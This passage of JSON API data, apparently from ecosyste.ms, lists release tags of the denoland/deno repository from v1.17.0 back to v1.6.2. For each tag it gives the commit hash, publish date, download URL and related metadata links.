_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts